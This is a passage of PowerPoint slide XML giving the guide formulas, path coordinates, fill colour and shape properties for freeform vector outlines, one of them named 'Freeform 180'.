                  <a:gd name="T58" fmla="*/ 2 w 298"/>
                  <a:gd name="T59" fmla="*/ 46 h 127"/>
                  <a:gd name="T60" fmla="*/ 12 w 298"/>
                  <a:gd name="T61" fmla="*/ 35 h 127"/>
                  <a:gd name="T62" fmla="*/ 23 w 298"/>
                  <a:gd name="T63" fmla="*/ 37 h 127"/>
                  <a:gd name="T64" fmla="*/ 26 w 298"/>
                  <a:gd name="T65" fmla="*/ 34 h 127"/>
                  <a:gd name="T66" fmla="*/ 31 w 298"/>
                  <a:gd name="T67" fmla="*/ 36 h 127"/>
                  <a:gd name="T68" fmla="*/ 49 w 298"/>
                  <a:gd name="T69" fmla="*/ 35 h 127"/>
                  <a:gd name="T70" fmla="*/ 55 w 298"/>
                  <a:gd name="T71" fmla="*/ 29 h 127"/>
                  <a:gd name="T72" fmla="*/ 52 w 298"/>
                  <a:gd name="T73" fmla="*/ 28 h 127"/>
                  <a:gd name="T74" fmla="*/ 65 w 298"/>
                  <a:gd name="T75" fmla="*/ 20 h 127"/>
                  <a:gd name="T76" fmla="*/ 85 w 298"/>
                  <a:gd name="T77" fmla="*/ 16 h 127"/>
                  <a:gd name="T78" fmla="*/ 113 w 298"/>
                  <a:gd name="T79" fmla="*/ 2 h 127"/>
                  <a:gd name="T80" fmla="*/ 142 w 298"/>
                  <a:gd name="T81" fmla="*/ 0 h 127"/>
                  <a:gd name="T82" fmla="*/ 158 w 298"/>
                  <a:gd name="T83" fmla="*/ 8 h 127"/>
                  <a:gd name="T84" fmla="*/ 178 w 298"/>
                  <a:gd name="T85" fmla="*/ 22 h 127"/>
                  <a:gd name="T86" fmla="*/ 212 w 298"/>
                  <a:gd name="T87" fmla="*/ 21 h 127"/>
                  <a:gd name="T88" fmla="*/ 242 w 298"/>
                  <a:gd name="T89" fmla="*/ 16 h 127"/>
                  <a:gd name="T90" fmla="*/ 265 w 298"/>
                  <a:gd name="T91" fmla="*/ 11 h 127"/>
                  <a:gd name="T92" fmla="*/ 283 w 298"/>
                  <a:gd name="T93" fmla="*/ 30 h 127"/>
                  <a:gd name="T94" fmla="*/ 296 w 298"/>
                  <a:gd name="T95" fmla="*/ 48 h 127"/>
                  <a:gd name="T96" fmla="*/ 287 w 298"/>
                  <a:gd name="T97" fmla="*/ 58 h 127"/>
                  <a:gd name="T98" fmla="*/ 290 w 298"/>
                  <a:gd name="T99" fmla="*/ 75 h 127"/>
                  <a:gd name="T100" fmla="*/ 289 w 298"/>
                  <a:gd name="T101" fmla="*/ 86 h 127"/>
                  <a:gd name="T102" fmla="*/ 293 w 298"/>
                  <a:gd name="T103" fmla="*/ 95 h 127"/>
                  <a:gd name="T104" fmla="*/ 32 w 298"/>
                  <a:gd name="T105" fmla="*/ 4 h 127"/>
                  <a:gd name="T106" fmla="*/ 43 w 298"/>
                  <a:gd name="T107" fmla="*/ 16 h 127"/>
                  <a:gd name="T108" fmla="*/ 41 w 298"/>
                  <a:gd name="T109" fmla="*/ 24 h 127"/>
                  <a:gd name="T110" fmla="*/ 20 w 298"/>
                  <a:gd name="T111" fmla="*/ 27 h 127"/>
                  <a:gd name="T112" fmla="*/ 6 w 298"/>
                  <a:gd name="T113" fmla="*/ 39 h 127"/>
                  <a:gd name="T114" fmla="*/ 3 w 298"/>
                  <a:gd name="T115" fmla="*/ 37 h 127"/>
                  <a:gd name="T116" fmla="*/ 2 w 298"/>
                  <a:gd name="T117" fmla="*/ 31 h 127"/>
                  <a:gd name="T118" fmla="*/ 9 w 298"/>
                  <a:gd name="T119" fmla="*/ 11 h 127"/>
                  <a:gd name="T120" fmla="*/ 17 w 298"/>
                  <a:gd name="T121" fmla="*/ 1 h 12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98"/>
                  <a:gd name="T184" fmla="*/ 0 h 127"/>
                  <a:gd name="T185" fmla="*/ 298 w 298"/>
                  <a:gd name="T186" fmla="*/ 127 h 12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98" h="127">
                    <a:moveTo>
                      <a:pt x="298" y="101"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="295" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="291" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="296" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="291" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="291" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="291" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="296" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="101"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="30" y="2"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="32" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="2"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36448" name="Freeform 180"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3153" y="2208"/>
                <a:ext cx="297" cy="127"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 287 w 297"/>
                  <a:gd name="T1" fmla="*/ 105 h 127"/>
                  <a:gd name="T2" fmla="*/ 281 w 297"/>
                  <a:gd name="T3" fmla="*/ 100 h 127"/>
                  <a:gd name="T4" fmla="*/ 265 w 297"/>
                  <a:gd name="T5" fmla="*/ 98 h 127"/>
                  <a:gd name="T6" fmla="*/ 257 w 297"/>
                  <a:gd name="T7" fmla="*/ 100 h 127"/>
                  <a:gd name="T8" fmla="*/ 230 w 297"/>
                  <a:gd name="T9" fmla="*/ 104 h 127"/>
                  <a:gd name="T10" fmla="*/ 193 w 297"/>
                  <a:gd name="T11" fmla="*/ 108 h 127"/>
                  <a:gd name="T12" fmla="*/ 169 w 297"/>
                  <a:gd name="T13" fmla="*/ 110 h 127"/>
                  <a:gd name="T14" fmla="*/ 169 w 297"/>
